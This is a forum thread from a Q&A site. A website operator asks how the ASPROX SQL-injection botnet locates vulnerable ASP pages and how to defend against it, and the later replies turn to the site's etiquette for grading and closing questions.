Link to home
Start Free TrialLog in
Avatar of garriganlyman
garriganlyman

asked on

Recent SQL Injection Attacks - ASP Solution Needed

So I have seen from the evaluations of the recent wave of ASPROX botnet attacks using SQL injections, that infected zombies/drones using the msccntr.exe  (I think that's the name) service that installs from the infected Web site, is forcing the drone to search google for certain types of ASP pages. Has anyone analyzed this piece of the threat? Does anyone know what the search terms are? I would imagine that one line of defense would be to make sure that this page type does not come up in the search, or that the page name, or parameter redirects to another location. Would like to put up a first line of defense. Even though our site has now been cleansed and hardened, attempts are still showing in the log files, only now the http response code at the end of the attempts is 404 instead of 200 or 500. I think controlling what you display in the google results somewhat, or what those links resolve to would be another good line of defense for stopping the attempts? If there is any information out there it would be greatly appreciated.

Thanks
Chris
Avatar of b0lsc0tt
b0lsc0tt
Flag of United States of America image

garriganlyman,

I don't know if this wil apply for the specific injection you suffered from but a recent conversation on this was at http:Q_23411125.html .  Even if the specific attack is different that Q had pretty good attention and participation and there seems to be some good, general info.

Let me know what you think or if that helps.  Let me know if you have any questions or need more information.

b0lsc0tt
ASKER CERTIFIED SOLUTION
Avatar of jahboite
jahboite
Flag of United Kingdom of Great Britain and Northern Ireland image

Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Please explain why you closed this as you did.  Awarding a B grade and choosing just one comment.  Especially since you never posted a comment both seem odd.
If you still need help or have a question then let us know.  If a mistake was made or you have a question about EE grading then let me know.  It is appropriate to always give experts a chance to earn the A and the way this was closed and your participation is hard to understand.
bol
Avatar of garriganlyman
garriganlyman

ASKER

I apologize, I am relatively new to the grading process, so if I did make a mistake, I do apologize. I think I had also gathered some information in the interim about the topic which backed up the conclusions that I had accepted as the answer, and was looking to not waste anyone's time.
Thanks for the response.  I see that you are relatively new and this is one of your first questions.  I am not saying there is anything definitely wrong.  It was odd for the reasons I mentioned but you definitely don't need to accept all answers with an A or choose all comments as an answer.  In the future a closing post to explain the result would be helpful, especially in a case where you haven't made other comments like this.
For this question and to get a good idea of your options take a look at http://www.experts-exchange.com/help.jsp#hi97 and http://www.experts-exchange.com/help.jsp#hi331 .  If after looking at that info you feel you would grade or close this differently then let me know.  I happen to be a zone advisor so I have the tools to reopen this for you.  If everything is fine then that info should be useful as your go to close future questions. :)  Let me know if you have a question.
bol
I too am a little surprised that an answer to this question was accepted so soon given that your questions and needs have not been answered:
Has anyone analyzed this piece of the threat?
Does anyone know what the search terms are?
I think controlling what you display in the google results somewhat, or what those links resolve to would be another good line of defense for stopping the attempts?
If there is any information out there it would be greatly appreciated.

I am not saying that you have done anything wrong here.  What I would say is that it is good practise to keep in mind the following things when asking questions and accepting answers to those questions:

Be clear about your requirements.
Respond to comments from experts so that they know whether their comments, from your perspective, are meeting your requirements.  This gives them a chance to fine-tune the information they respond with.
Remember that your question may be viewed by thousands of people looking for solutions and help them by
 a) accepting as answers those responses that form some or all of the solution you were looking for and
 b) consider commenting on the given solutions yourself before closing a question (there's a place to do this when you close the question too).
It's not always possible, but you should give experts the opportunity to earn an A grade, rather than award a B or C, whenever you can.
If you have answered part or all of your question yourself, you should say so, give the solution and accept that solution as all or part of the answer when closing the question - remember that the solution may help thousands of others in the future.

At the end of the day, how you use EE is a matter of personal choice, but these tips should help you and those coming after to get the best from EE.

Finally, don't feel pressured to close a question (you're not wasting anyones time!) before you're completely happy to.  Oh, and finally finally, take a moment, when you have the time, to read the guides to asking, closing and answering questions - there's lots of useful info there.
https://www.experts-exchange.com/help.jsp#hs7
https://www.experts-exchange.com/help.jsp#hs64
https://www.experts-exchange.com/questionTips.jsp
https://www.experts-exchange.com/help.jsp#hs8
https://www.experts-exchange.com/help.jsp#hs41
Oh and another thing, proof read your comments:

I meant to say "given that your questions and needs have not been answered as fully as they might have been:"

whoops.
So is there anything I should do/can do to remedy this situation?